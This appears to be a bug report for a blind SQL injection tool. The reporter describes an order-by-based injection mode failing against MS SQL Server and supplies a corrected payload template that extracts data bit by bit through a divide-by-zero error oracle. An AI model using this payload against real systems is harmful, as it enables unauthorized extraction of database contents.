What steps will reproduce the problem? 1. Run program against MS SQL Server with type 2 (order by based injection)

What is the expected output? What do you see instead? The program should return a valid response on the cases where the and with the ascii substring returns 1. The program fails because all responses return http response code 500.

What version of the product are you using? On what operating system? Using version 2.2 on operating system Linux (ubuntu 8.10)

Please provide any additional information below. I have corrected the problem by changing the code on line 216 from: $val = "$head,(select case when((ASCII($sql) $and $bit) =0) then 1 else 1/0 end )=1 $tail"; to: $val = "$head,(select case when((ASCII($sql) $and $bit) =0) then 1 else 1/0 end ) $tail";

thnx guru